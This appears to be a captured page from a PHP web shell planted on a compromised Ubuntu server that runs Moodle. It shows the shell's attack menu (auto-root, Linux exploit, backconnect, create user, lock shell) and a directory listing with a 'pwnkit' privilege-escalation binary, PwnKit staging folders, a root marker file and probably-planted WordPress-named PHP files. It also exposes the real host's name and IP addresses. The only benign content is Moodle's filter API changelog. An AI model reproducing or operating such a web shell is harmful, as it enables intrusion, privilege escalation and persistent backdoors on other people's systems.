Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle.backup.39 /
filter /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
activitynames
[ DIR ]
drwxrwxr-x
algebra
[ DIR ]
drwxrwxr-x
censor
[ DIR ]
drwxrwxr-x
classes
[ DIR ]
drwxrwxr-x
data
[ DIR ]
drwxrwxr-x
emailprotect
[ DIR ]
drwxrwxr-x
emoticon
[ DIR ]
drwxrwxr-x
glossary
[ DIR ]
drwxrwxr-x
mathjaxloader
[ DIR ]
drwxrwxr-x
mediaplugin
[ DIR ]
drwxrwxr-x
multilang
[ DIR ]
drwxrwxr-x
tests
[ DIR ]
drwxrwxr-x
tex
[ DIR ]
drwxrwxr-x
tidy
[ DIR ]
drwxrwxr-x
urltolink
[ DIR ]
drwxrwxr-x
.htaccess
197
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
index.html
1
B
-rw-rw-r--
local_settings_form.php
2.87
KB
-rw-rw-r--
manage.php
8.14
KB
-rw-rw-r--
pwnkit
10.99
KB
-rwxr-xr-x
upgrade.txt
1.7
KB
-rw-rw-r--
wp-blog-header.php
2.74
KB
-r--r--r--
wp-cron.php
2.74
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : upgrade.txt
This file describes API changes in core filter API and plugins, information provided here is intended especially for developers. === 3.0 === * New argument $skipfilters to filter_manager::filter_text to allow applying the filters with a given one omitted. * New admin setting class admin_setting_filter_types which can be used if you want to make the disablefilters value in your code configurable. * Methods filter_manager::text_filtering_hash and moodle_text_filter::hash have been deprecated. There were use by the old Moodle filtered text caching system that was removed several releases ago. === 2.7 === * Finally filter may use $PAGE and $OUTPUT, yay! * Old global text caching was removed, each filter is now responsible for own caching. === 2.6 === * filtersettings.php is now deprecated, migrate to standard settings.php === 2.5 === * legacy_filter emulation was removed * support for 'mod/*' filters was removed * use short filter name instead of old path, ex.: 'filter/tex' ---> 'tex' in all filter API functions and methods === 2.3 === * new setup() method added to moodle_text_filter, invoked before filtering happens, used to add all the requirements to the page (js, css...) and/or other init tasks. See filter/glossary for an example using the API (and MDL-32279 for its justification). === 2.2 === * legacy filters and legacy locations have been deprecated, so any old filter should be updated to use the new moodle_text_filter, and any filter bundled under mod/xxxx directories be moved to /filter/xxxx (MDL-29995). They will stop working completely in Moodle 2.3 (MDL-29996). See the glossary or data filters for examples of legacy module filters and locations already updated.
Close